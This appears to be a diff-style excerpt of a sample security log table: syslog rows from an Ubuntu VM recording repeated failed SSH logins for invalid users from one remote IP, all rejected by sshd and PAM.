+1914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:44,UbuntuDevEnv,2019-06-28 05:04:44,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user user from 193.201.224.232 port 27861 ssh2 [preauth],90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,27861,,
+1915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:44,UbuntuDevEnv,2019-06-28 05:04:44,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 27861 ssh2,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,27861,,
+1916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:44,UbuntuDevEnv,2019-06-28 05:04:44,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:44,UbuntuDevEnv,2019-06-28 05:04:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:44,UbuntuDevEnv,2019-06-28 05:04:44,auth,UbuntuDevEnv,info,Disconnecting invalid user user 193.201.224.232 port 27861: Too many authentication failures [preauth],90690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,27861,,
+1919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:04:54,UbuntuDevEnv,2019-06-28 05:04:53,auth,UbuntuDevEnv,info,Invalid user user from 193.201.224.232 port 10912,90755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,10912,,
+1920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:13,UbuntuDevEnv,2019-06-28 05:05:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:13,UbuntuDevEnv,2019-06-28 05:05:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,90755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:15,UbuntuDevEnv,2019-06-28 05:05:14,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 10912 ssh2,90755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,10912,,
+1923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:15,UbuntuDevEnv,2019-06-28 05:05:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:17,UbuntuDevEnv,2019-06-28 05:05:16,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 10912 ssh2,90755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,10912,,
+1925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:17,UbuntuDevEnv,2019-06-28 05:05:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:19,UbuntuDevEnv,2019-06-28 05:05:19,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 10912 ssh2,90755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,10912,,
+1927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:19,UbuntuDevEnv,2019-06-28 05:05:19,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,90755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:19,UbuntuDevEnv,2019-06-28 05:05:19,auth,UbuntuDevEnv,info,"Disconnecting invalid user user 193.201.224.232 port 10912: Change of username or service not allowed: (user,ssh-connection) -> (User,ssh-connection) [preauth]",90755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,10912,,
+1929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:23,UbuntuDevEnv,2019-06-28 05:05:23,auth,UbuntuDevEnv,info,Invalid user User from 193.201.224.232 port 33646,90889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,User,193.201.224.2,33646,,
+1930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:23,UbuntuDevEnv,2019-06-28 05:05:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:23,UbuntuDevEnv,2019-06-28 05:05:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,90889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:26,UbuntuDevEnv,2019-06-28 05:05:25,auth,UbuntuDevEnv,info,"Disconnecting invalid user User 193.201.224.232 port 33646: Change of username or service not allowed: (User,ssh-connection) -> (user,ssh-connection) [preauth]",90889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,User,193.201.224.2,33646,,
+1933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:26,UbuntuDevEnv,2019-06-28 05:05:25,auth,UbuntuDevEnv,info,Failed password for invalid user User from 193.201.224.232 port 33646 ssh2,90889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,User,193.201.224.2,33646,,
+1934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:26,UbuntuDevEnv,2019-06-28 05:05:26,auth,UbuntuDevEnv,info,Invalid user user from 193.201.224.232 port 2871,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,2871,,
+1935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:27,UbuntuDevEnv,2019-06-28 05:05:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:27,UbuntuDevEnv,2019-06-28 05:05:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:28,UbuntuDevEnv,2019-06-28 05:05:28,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 2871 ssh2,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,2871,,
+1938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:29,UbuntuDevEnv,2019-06-28 05:05:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:31,UbuntuDevEnv,2019-06-28 05:05:31,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 2871 ssh2,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,2871,,
+1940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:32,UbuntuDevEnv,2019-06-28 05:05:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:34,UbuntuDevEnv,2019-06-28 05:05:33,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 2871 ssh2,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,2871,,
+1942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:34,UbuntuDevEnv,2019-06-28 05:05:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:35,UbuntuDevEnv,2019-06-28 05:05:35,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 2871 ssh2,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,2871,,
+1944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:37,UbuntuDevEnv,2019-06-28 05:05:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:40,UbuntuDevEnv,2019-06-28 05:05:39,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 2871 ssh2,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,2871,,
+1946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:40,UbuntuDevEnv,2019-06-28 05:05:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:42,UbuntuDevEnv,2019-06-28 05:05:42,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:42,UbuntuDevEnv,2019-06-28 05:05:42,auth,UbuntuDevEnv,info,Disconnecting invalid user user 193.201.224.232 port 2871: Too many authentication failures [preauth],90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,2871,,
+1949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:42,UbuntuDevEnv,2019-06-28 05:05:42,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 2871 ssh2,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,2871,,
+1950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:42,UbuntuDevEnv,2019-06-28 05:05:42,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user user from 193.201.224.232 port 2871 ssh2 [preauth],90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,2871,,
+1951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:42,UbuntuDevEnv,2019-06-28 05:05:42,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,90915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:45,UbuntuDevEnv,2019-06-28 05:05:44,auth,UbuntuDevEnv,info,Invalid user user from 193.201.224.232 port 44919,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,44919,,
+1953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:45,UbuntuDevEnv,2019-06-28 05:05:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:45,UbuntuDevEnv,2019-06-28 05:05:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:47,UbuntuDevEnv,2019-06-28 05:05:46,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 44919 ssh2,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,44919,,
+1956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:47,UbuntuDevEnv,2019-06-28 05:05:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:49,UbuntuDevEnv,2019-06-28 05:05:48,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 44919 ssh2,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,44919,,
+1958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:49,UbuntuDevEnv,2019-06-28 05:05:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:51,UbuntuDevEnv,2019-06-28 05:05:51,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 44919 ssh2,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,44919,,
+1960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:53,UbuntuDevEnv,2019-06-28 05:05:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:56,UbuntuDevEnv,2019-06-28 05:05:56,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 44919 ssh2,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,44919,,
+1962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:56,UbuntuDevEnv,2019-06-28 05:05:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:58,UbuntuDevEnv,2019-06-28 05:05:58,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 44919 ssh2,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,44919,,
+1964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:05:58,UbuntuDevEnv,2019-06-28 05:05:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:00,UbuntuDevEnv,2019-06-28 05:06:00,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 44919 ssh2,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,44919,,
+1966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:00,UbuntuDevEnv,2019-06-28 05:06:00,auth,UbuntuDevEnv,info,Disconnecting invalid user user 193.201.224.232 port 44919: Too many authentication failures [preauth],90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,44919,,
+1967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:00,UbuntuDevEnv,2019-06-28 05:06:00,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:00,UbuntuDevEnv,2019-06-28 05:06:00,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:00,UbuntuDevEnv,2019-06-28 05:06:00,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user user from 193.201.224.232 port 44919 ssh2 [preauth],90974,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,44919,,
+1970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:05,UbuntuDevEnv,2019-06-28 05:06:04,auth,UbuntuDevEnv,info,Invalid user user from 193.201.224.232 port 25108,91050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,25108,,
+1971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:05,UbuntuDevEnv,2019-06-28 05:06:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:05,UbuntuDevEnv,2019-06-28 05:06:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:06:07,UbuntuDevEnv,2019-06-28 05:06:07,auth,UbuntuDevEnv,info,Failed password for invalid user user from 193.201.224.232 port 25108 ssh2,91050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,193.201.224.2,25108,,
